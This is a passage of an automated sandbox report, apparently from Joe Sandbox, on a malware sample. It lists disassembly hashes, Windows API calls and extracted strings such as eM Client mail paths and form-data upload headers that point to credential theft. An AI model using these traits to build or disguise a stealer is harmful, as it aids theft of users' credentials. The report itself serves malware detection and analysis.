                                                          • Opcode ID: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                          • Instruction ID: 373710123005f16d466fbf61102d91235a16be84b9ed3eb2ab6254e0a7e141d7
                                                          • Opcode Fuzzy Hash: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                          • Instruction Fuzzy Hash: B6016D33B001145FBF11CE69EC4595B3796EBC1328B244132F904CB185FB39CC028389
                                                          APIs
                                                            • Part of subcall function 0044EB6F: RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,00413871,00000000,00000000,00000000,00413871,00000000,00000000,7595F770,?,0041A136,00001FE6,00003CA7,?,000016E5), ref: 004569FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                          • Instruction ID: a5a40cd43560794f83e54c6bbfcb227c9197063c5c667a14a31a2b77de81b9f8
                                                          • Opcode Fuzzy Hash: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                          • Instruction Fuzzy Hash: 80F0C8B110011576AB212A279C01B6B276C9FC1B76F56013FFC1497293EE7C9809C29E
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                          • Instruction ID: 035a614d3876f6906020b157cdd10206fdefeae5334def747215f66390aa104c
                                                          • Opcode Fuzzy Hash: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                          • Instruction Fuzzy Hash: BBF05939200620A7AB205B728C01B6B3758AF81772B044127FC08DA282DA38DC09C6EE
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                          • Instruction ID: b54a30de40d39881521df567edad888a5efcf5dcf9e065f2953d68bc5b8e4da5
                                                          • Opcode Fuzzy Hash: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                          • Instruction Fuzzy Hash: 3AE0E5212001A56AFA30A767CC01B6B3A4DFF417B8F010037ED47A62D1DBACEC0285AE
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00799E7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572460076.0000000000799000.00000040.00000020.00020000.00000000.sdmp, Offset: 00799000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_799000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction ID: e9a0f993f7225eeb98cfe6bc69403fcafbb1778918b2d0b94fcc77f86302ef47
                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction Fuzzy Hash: CE113C79A00208EFDB01DF99C989E99BBF5AF08350F058094FA489B362D775EA50DF80
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$Y[[T$bi${#9${#9$Y=`$Y=`
                                                          • API String ID: 1659193697-3907602706
                                                          • Opcode ID: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                          • Instruction ID: 061f2e9c6992cadd8bb6edb3a7c72a9665a9c38d2bc4fcde0046632fbb5de356
                                                          • Opcode Fuzzy Hash: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                          • Instruction Fuzzy Hash: F5F208B1D0061E8BDF268F58C9456BEBBB5AB05718F24052BE506FB391E774CB40CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: Content-Disposition: form-data; name="$A@6e$A@6e$Content-Type: attachment/x-object$RY30$SqDe87817huf871793q74$^^4$^^4$ame=$ilen
                                                          • API String ID: 4218353326-1595699696
                                                          • Opcode ID: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                          • Instruction ID: 2d689a8b6144ae040ff6817911910587bd341415a88b77611baba4cffa878017
                                                          • Opcode Fuzzy Hash: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                          • Instruction Fuzzy Hash: EC72A771D442198BDF18CF98D9855FEBBB0EB14314F24056BE915EB360E3788A858BCB
                                                          APIs
                                                          • wsprintfW.USER32 ref: 02364942
                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0236498C
                                                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,00000001), ref: 0236500C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumOpenwsprintf
                                                          • String ID: $jRk$$jRk$?$TT4$TT4$y_B>$y_B>
                                                          • API String ID: 934838074-1833258458
                                                          • Opcode ID: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                          • Instruction ID: 19feb013a6cf79eff8d439eebe8dd6630f6f5f91c1dacc54ec829864038a82b4
                                                          • Opcode Fuzzy Hash: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                          • Instruction Fuzzy Hash: E8624CB1D0021A8BCF34CB98D88C6BDBABDAB14714F24C626D645EB359D374CA51CBD2
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strncpy
                                                          • String ID: $jRk$$jRk$3Z@$576xed$TT4$TT4$x_B>$y_B>$y_B>
                                                          • API String ID: 2961919466-3812700333
                                                          • Opcode ID: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                          • Instruction ID: c1f0278ec094f6be02d202c53d620e15fc525e7d6860b659e372b79efda81f17
                                                          • Opcode Fuzzy Hash: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                          • Instruction Fuzzy Hash: 3982DBB1D0051A8BDF28DB68C9451BEB670EB5C310F29662BE505EB360D738DE418B9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$n_v$n_v$u2B$v2B$v2B
                                                          • API String ID: 0-3549259986
                                                          • Opcode ID: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                          • Instruction ID: 3c731e79af0a7bf0a604628639f1c40d542e5cd86105cca68e770fcb4dd532d8
                                                          • Opcode Fuzzy Hash: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                          • Instruction Fuzzy Hash: DCE208B1E002199BDF29CB98C8856BE7AB5AF40314F14056BF50AFB7A1D774DB40CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: Content-Disposition: form-data; name="$ &$($:[$SqDe87817huf871793q74
                                                          • API String ID: 4218353326-898291561
                                                          • Opcode ID: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                          • Instruction ID: fda5cd55cfb9f0796932eaeb7ac8b2d4ab06e0c9493bffbe09938a436643aec3
                                                          • Opcode Fuzzy Hash: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                          • Instruction Fuzzy Hash: 7F128DB090560A8BCF18CF58C9901BEBBB1FF54354F24592BE855EB394D7388991CB8B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strncpy
                                                          • String ID: $jRk$$jRk$TT4$TT4$mE$x_B>$y_B>$y_B>
                                                          • API String ID: 2961919466-2403683918
                                                          • Opcode ID: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                          • Instruction ID: 22b096d44901ad24eeef4dc69764f4a0ba606ea3cfa2d06e25c1f3dba60b6422
                                                          • Opcode Fuzzy Hash: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                          • Instruction Fuzzy Hash: ED8227B1D1021D8BDF24CB98D89D6BDBABCAB04254F64853BD405EB359E334DA80CF96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: f3@$x_B>$y_B>$y_B>
                                                          • API String ID: 0-2758273646
                                                          • Opcode ID: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                          • Instruction ID: 769378b0013e5f891025f4b50e79353ec4a26f3ac52f3a61e025b4fcd72a7191
                                                          • Opcode Fuzzy Hash: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                          • Instruction Fuzzy Hash: 2BC1A1756183019BCB2C8A19C99153EBAE5AB85314F14893FF556EB3F0E338D8419B4B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: Ju^%$Ku^%$Y=`$Y=`$Y=`
                                                          • API String ID: 4218353326-1811093487
                                                          • Opcode ID: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
                                                          • Instruction ID: 68bed0c00360ed0a45c1e6ce9cbfc25002c960087630870fd3b76e024578c11c
                                                          • Opcode Fuzzy Hash: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
                                                          • Instruction Fuzzy Hash: D662D3B1D402198BCF24CB98C9856BEBBB0EB18305F24251BD595FB350D33CCA518BAB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: (lu$)lu$)lu$n_v$n_v$u2B$v2B$v2B
                                                          • API String ID: 4218353326-1100714106
                                                          • Opcode ID: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
                                                          • Instruction ID: a2355ce2209b5258348a648dcbfed05c01f212a34098c733ae6d56c92e88b106
                                                          • Opcode Fuzzy Hash: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
                                                          • Instruction Fuzzy Hash: 717284B2D001199BCF64CFAC848557EB6B0BB18310F24251BD55AEB351E3B89E91CF9B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          • Opcode ID: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
                                                          • Instruction ID: 851cf4d307f2775529c2b2c48624cd02a74d3cb87db6a9e2c754e45b37c83e55
                                                          • Opcode Fuzzy Hash: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
                                                          • Instruction Fuzzy Hash: C5D23B71E082288FDB65CE24DD407EAB7B5EB44306F1445EBD80DE7241EB78AE898F45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $jRk$$jRk$ST4$TT4$q7 C$q7 C$y_B>
                                                          • API String ID: 0-4120928008
                                                          • Opcode ID: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                          • Instruction ID: 5ed2bce57202caa61740e9a0066a193a3aa364e15e010ca0d77f5b321bac14a1
                                                          • Opcode Fuzzy Hash: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                          • Instruction Fuzzy Hash: 6792C670B0A3159BD724DF18E58563EBAE1EB94700FA8891FE5C9CB390D679CC418B4B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleModuleName
                                                          • String ID: T5 S$U5 S$U5 S$]cnq$fS))
                                                          • API String ID: 2106025501-2879408294
                                                          • Opcode ID: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
                                                          • Instruction ID: dfb0ff48f0b3588d0c8ddc0fc82928454e0cf031636ecd05e75d9b592114eb49
                                                          • Opcode Fuzzy Hash: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
                                                          • Instruction Fuzzy Hash: B2A271B07097118BD724EF1DE69522EBBE0EB94750FA58D1FE185CB350E638C8819B4B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcessSleep
                                                          • String ID: Ku^%$Ku^%
                                                          • API String ID: 911557368-1067927601
                                                          • Opcode ID: 82cfc510ece84957cbba0257fc153cb2f1f42220bc350d1360029cd4826f0e13
                                                          • Instruction ID: ae3353009da93772ca4eb3d457df80e4ada0c426cddf7d4427e14e292bc8784f
                                                          • Opcode Fuzzy Hash: 82cfc510ece84957cbba0257fc153cb2f1f42220bc350d1360029cd4826f0e13
                                                          • Instruction Fuzzy Hash: 12A102B1514B018BCB368F1DC990A27B6F5AB45724724891EECABCBA61D774EE50CF02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (lu$)lu$)lu$n_v$n_v
                                                          • API String ID: 0-3830700584
                                                          • Opcode ID: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                          • Instruction ID: 4a2fd8414ffc0d2b7e824df66967180c6b9bc980e05f2bb9b5fb8abbe135a622
                                                          • Opcode Fuzzy Hash: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                          • Instruction Fuzzy Hash: 1D22B478D0460A9BCF24CF9DC8956FFBBB0EB14304F24052BD515EB351D3789A868B9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%
                                                          • API String ID: 0-3469696018
                                                          • Opcode ID: 6ec76950be12901a45a75c5ce88806d55f504ea767741fb8e6c205ae61d7ac73
                                                          • Instruction ID: 7c7ca289ac7ac6f99319bda9901ca4dbbf0a493f194e0bb693dffbcb6a384f16
                                                          • Opcode Fuzzy Hash: 6ec76950be12901a45a75c5ce88806d55f504ea767741fb8e6c205ae61d7ac73
                                                          • Instruction Fuzzy Hash: 2EB11871D1021987CF38DF58884AA7E7679BB82304F284627ED59EBA55E334C640CB93
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,00469144,?,0233BA31,0233CC5B,?,?,?), ref: 0233AEC5
                                                          • lstrcatW.KERNEL32(?,0045FD78,?,?,?,?,?,?,?,?,00469144,?,0233BA31,0233CC5B,?,?), ref: 0233AF29
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcatlstrlen
                                                          • String ID:
                                                          • API String ID: 1475610065-0
                                                          • Opcode ID: ef72a88249dd871b6e6f7590a3c2d473460619251f7bcc7e3a36d31713e60fb7
                                                          • Instruction ID: 718d68a3a69de4f10929df6516c9a92aa138f432d4c3b93c6123637d506a5ca7
                                                          • Opcode Fuzzy Hash: ef72a88249dd871b6e6f7590a3c2d473460619251f7bcc7e3a36d31713e60fb7
                                                          • Instruction Fuzzy Hash: 86022571D102198BDF2A8F58C891BFDB676BB08318F14462BE455EB2A0E3748B41CB96
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strrchr
                                                          • String ID:
                                                          • API String ID: 3213747228-0
                                                          • Opcode ID: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
                                                          • Instruction ID: 8ec8fb1480d7890853f4d9f50d5551423c0e27afaeab5e375f7c18d1f8a446b0
                                                          • Opcode Fuzzy Hash: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
                                                          • Instruction Fuzzy Hash: 7EB147329002559FFB11CF68C8817EFBBA5EF55304F14817BE815AB342D6389D0ACB69
                                                          APIs
                                                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452057
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
                                                          • FindClose.KERNEL32(00000000), ref: 004520F4
                                                          • FindClose.KERNEL32(00000000), ref: 00452117
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
                                                          • Instruction ID: 88b061fe18a59ed71dd7726e396f37314d98d9ff08531aa008276cfa6a830ce1
                                                          • Opcode Fuzzy Hash: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
                                                          • Instruction Fuzzy Hash: 4F411971901519AFDF20DF64DD88ABFB379EB4530AF004197E905D3181E7B89E88CB69
                                                          APIs
                                                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 023822BE
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 02382339
                                                          • FindClose.KERNEL32(00000000), ref: 0238235B
                                                          • FindClose.KERNEL32(00000000), ref: 0238237E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                          • Instruction ID: 8a0010b05d2259908ce830c831d36ff31ce5211dd520ee179a24856a0ee9ee51
                                                          • Opcode Fuzzy Hash: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                          • Instruction Fuzzy Hash: CF41A171A00759AADB20EF64CC98ABBB3B9EB84304F044195EC05DB144E770DE84CF65
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: 0$8
                                                          • API String ID: 4218353326-46163386
                                                          • Opcode ID: dffc9e5abd372e9afb64596e263c2f6f11399d763a87511cb0e2e762d002d851
                                                          • Instruction ID: 4a4157f18493c412a49744d30cfcbbbc573f023624cab823fa42490c9b2fab12
                                                          • Opcode Fuzzy Hash: dffc9e5abd372e9afb64596e263c2f6f11399d763a87511cb0e2e762d002d851
                                                          • Instruction Fuzzy Hash: 037256716083409FCB14CF19C880BABBBE2AF88314F15892EF99887351D779D995CF96
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043CEA1
                                                          • IsDebuggerPresent.KERNEL32 ref: 0043CF6D
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043CF8D
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043CF97
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                          • String ID:
                                                          • API String ID: 254469556-0
                                                          • Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                          • Instruction ID: 9043f40afcec0259649162862996236607bac432cbf7b643fd488768b54bd5d0
                                                          • Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                          • Instruction Fuzzy Hash: 57312BB5D05219DBDB10DF65D989BCDBBB8AF08304F1040AAE40DA7250EBB55A84CF49
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                          • API String ID: 0-1928883120
                                                          • Opcode ID: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                          • Instruction ID: 295a2138c5a9904cce95bca20cbaf49c8dc44489dbf6f35dc9c4833d63c62f8a
                                                          • Opcode Fuzzy Hash: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                          • Instruction Fuzzy Hash: 3EE10BB1D1012E9BDF288B98CD81EBE76B5AB14204F244526EC1EF7751E739CA41CB93
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00405C85), ref: 0044E433
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00405C85), ref: 0044E43D
                                                          • UnhandledExceptionFilter.KERNEL32(0045F807,?,?,?,?,?,00405C85), ref: 0044E44A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
                                                          • Instruction ID: af30a7423d53b2ed9e05bfdfaa0a26c4abe4ecd8aa3d0fdc8ac6f86824fa8700
                                                          • Opcode Fuzzy Hash: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
                                                          • Instruction Fuzzy Hash: 2231C4749012299BCB21DF65D889BCDBBB8BF08310F5041EAE81CA7250E7749F858F49
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000200), ref: 00424C0E
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00424C22
                                                          • CloseHandle.KERNEL32(00000000), ref: 00424C2E
                                                          Memory Dump Source
